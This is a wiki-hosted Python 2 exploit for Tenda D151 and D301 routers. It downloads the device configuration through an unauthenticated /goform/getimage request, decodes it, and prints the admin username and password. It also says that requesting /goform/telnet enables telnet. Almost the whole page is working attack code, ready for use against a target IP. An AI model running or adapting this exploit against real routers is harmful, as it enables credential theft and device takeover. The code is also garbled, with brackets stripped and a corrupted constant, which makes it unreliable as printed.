免费、自由、人人可编辑的漏洞库--PwnWiki.com
,
EXP
# Exploit Title: Tenda D151 & D301 - Configuration Download (Unauthenticated)
# Date: 19-04-2021
# Exploit Author: BenChaliah
# Author link: https://github.com/BenChaliah
# Vendor Homepage: https://www.tendacn.com
# Software Link: https://www.tendacn.com/us/download/detail-3331.html
# Versions:
# - D301 1.2.11.2_EN
# - D301 V2.0 50.22.1.8_EN
# - D151 V2.0 50.21.1.5_EN
# --- Description --- #
# This exploits allows for the download of the current router config including the admin login, just by requesting {IP}/goform/getimage,
# you can also activate telnet service by requesting /goform/telnet. Telnet activation issue exists in many other tenda devices too.
# --- Proof of concept --- #
import struct
import itertools
import random, sys
import requests
import base64
FETCH_CODE = "\x80\x0f\x07\xe7\x83i\email protected\x9c\x8ef\x93y\xb8z"
ADMIN_LOG_CFG = {'AdminPassword': 'admin', 'SupportPassword': 'support'}
CLEAR_CODE = 256
END_OF_CODE = CLEAR_CODE + 1
MIN_WIDTH = 8
DEFAULT_MIN_BITS = MIN_WIDTH + 1
DEFAULT_MAX_BITS = 12
def cmsDecoder(compressed_cfg):
_cp_dict = dict((pt, struct.pack("B", pt)) for pt in range(256))
_cp_dictCLEAR_CODE = CLEAR_CODE
_cp_dictEND_OF_CODE = END_OF_CODE
prefix, offset, ignore = None, 0, 0
codepoints_arr, remainder, bits = , ,
init_csize = len(_cp_dict)
codesize = init_csize
minwidth = MIN_WIDTH
while (1 << minwidth) < codesize:
minwidth = minwidth + 1
pointwidth = minwidth
buts_arr =
for b in compressed_cfg:
value = struct.unpack("B", b)0
for bitplusone in range(8, 0, -1):
bitindex = bitplusone - 1
buts_arr.append(1 & (value >> bitindex))
for nextbit in buts_arr:
offset = (offset + 1) % 8
if ignore > 0:
ignore = ignore - 1
continue
bits.append(nextbit)
if len(bits) == pointwidth:
cp_int = 0
lsb_first = b for b in bits
lsb_first.reverse()
for bit_index in range(len(lsb_first)):
if lsb_firstbit_index:
cp_int = cp_int | (1 << bit_index)
bits =
codepoints_arr.append(cp_int)
codesize = codesize + 1
if cp_int in CLEAR_CODE, END_OF_CODE:
codesize = init_csize
pointwidth = minwidth
else:
while codesize >= (2 ** pointwidth):
pointwidth = pointwidth + 1
if cp_int == END_OF_CODE:
ignore = (8 - offset) % 8
decodedBytes =
for cp_int in codepoints_arr:
suffix = ""
if cp_int == CLEAR_CODE:
_cp_dict = dict((pt, struct.pack("B", pt)) for pt in range(256))
_cp_dictCLEAR_CODE = CLEAR_CODE
_cp_dictEND_OF_CODE = END_OF_CODE
prefix = None
elif cp_int != END_OF_CODE:
if cp_int in _cp_dict:
suffix = _cp_dictcp_int
if None != prefix:
_cp_dictlen(_cp_dict) = prefix + suffix0
else:
suffix = prefix + prefix0
_cp_dictlen(_cp_dict) = suffix
prefix = suffix
decoded = suffix
for char in decoded:
decodedBytes.append(char)
return decodedBytes
def exploit(ip):
print "! Downloading config"
try:
r = requests.get("http://{}/goform/getimage".format(ip))
pass
except:
print "- Failed to download the config, the target may not be vulnerable"
BIN_CONTENT = r.content
BIN_CONTENT = BIN_CONTENTBIN_CONTENT.index(FETCH_CODE)::16*50
CONFIG_XML = b"".join(cmsDecoder(BIN_CONTENT))
USER_, PASS_ = "", ""
for i in ADMIN_LOG_CFG.keys():
if i in CONFIG_XML:
CONFIG_XML = CONFIG_XMLCONFIG_XML.index(i) + len(i) + 1:
PASS_ = CONFIG_XML:CONFIG_XML.index('</')
USER_ = ADMIN_LOG_CFGi
print "\tusername: {}\n\tpassword: {}\n".format(USER_, base64.b64decode(PASS_).rstrip('\x00'))
return 0
print "- Failed to decode the config file\n"
return -1
if len(sys.argv) == 1:
print "usage: python2 " + sys.argv0 + " router_ip"
print "example: python2 exploit.py http://192.168.1.1"
exit()
if __name__ == "__main__":
print """\
_ _
___ (~ )( ~)
/ \_\ \/ /
| D_ \ \/ -- By email protected@h
| D _/\ \ -- email protected
\___/ / /\ \\
(_ )( _)
"""
try:
exploit(sys.argv1)
except Exception as e:
print str(e)
免费、自由、人人可编辑的漏洞库--pwnwiki.com
